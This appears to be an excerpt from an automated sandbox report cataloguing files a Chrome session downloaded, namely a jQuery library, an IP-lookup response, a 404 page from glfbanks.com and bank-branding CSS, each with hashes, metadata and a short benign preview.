                              SHA1:1055018C28AB41087EF9CCEFE411606893DABEA2
                              SHA-256:87083882CC6015984EB0411A99D3981817F5DC5C90BA24F0940420C5548D82DE
                              SHA-512:DCFF2B5C2B8625D3593A7531FF4DDCD633939CC9F7ACFEB79C18A9E6038FDAA99487960075502F159D44F902D965B0B5AED32B41BFA66A1DC07D85B5D5152B58
                              Malicious:false
                              Reputation:unknown
                              URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js
                              Preview:/*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:downloaded
                              Size (bytes):21
                              Entropy (8bit):3.594465636961452
                              Encrypted:false
                              SSDEEP:
                              MD5:909AD59B6307B0CD8BFE7961D4B98778
                              SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                              SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                              SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                              Malicious:false
                              Reputation:unknown
                              URL:https://api.ipify.org/?format=json
                              Preview:{"ip":"8.46.123.189"}
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text
                              Category:downloaded
                              Size (bytes):315
                              Entropy (8bit):5.0572271090563765
                              Encrypted:false
                              SSDEEP:
                              MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                              SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                              SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                              SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                              Malicious:false
                              Reputation:unknown
                              URL:https://glfbanks.com/spgbuck/files/css/ucfb_main_chunk.css
                              Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6935)
                              Category:downloaded
                              Size (bytes):6936
                              Entropy (8bit):5.19345898437518
                              Encrypted:false
                              SSDEEP:
                              MD5:8BF14F1F49B2DEFC0FCCA545BF647379
                              SHA1:20A7B225B86D43644EE0A1CA029265FA19D97982
                              SHA-256:C3B6AC0CEA999FEC8DE44D92BEF5E4E7C3C89FDA8E1A4D7B3B7BD17369B05FE1
                              SHA-512:72217FB7A2EEB058B238BD1005F943750EA96F9AFF12E48947154811A929ABA98DFA9584B2894B072E3B85DCD25C2327B3BA4C0F671A3FAF55DCEF03D5C7179C
                              Malicious:false
                              Reputation:unknown
                              URL:https://resource.digitalinsight.com/branding/11/03011/css/branding.css?v=1521060143837
                              Preview:body{background-color:#ededed}a,.di-svg,.di-glyphicons,.di-icon,[class*='di-icon-'],.glyphicons{color:#05c}a:hover,a:focus{color:#05c}.brand-type-a{background-color:#4859A6 !important;color:Arial,"Helvetica Neue",Helvetica,sans-serif !important;font-family:Arial,"Helvetica Neue",Helvetica,sans-serif}.brand-type-a-text-style{font-family:Arial,"Helvetica Neue",Helvetica,sans-serif}.brand-type-a-10p{color:rgba(72,89,166,0.1) !important}.brand-type-a-bg-10p{background-color:rgba(72,89,166,0.1) !important}.brand-type-a-bg{background-color:#4859A6 !important}.brand-type-a-text{color:Arial,"Helvetica Neue",Helvetica,sans-serif !important;font-family:Arial,"Helvetica Neue",Helvetica,sans-serif}.brand-type-b{background-color:#4859A6 !important;color:#fff !important}.brand-type-b-bg{background-color:#4859A6 !important}.brand-type-b-text{color:#fff !important}.brand-link{color:#05c !important}.page-loader{color:#4859A6}.page-loader svg g{stroke:rgba(72,89,166,0.5)}.di-almanac .day>.current-day{bo
                              No static file info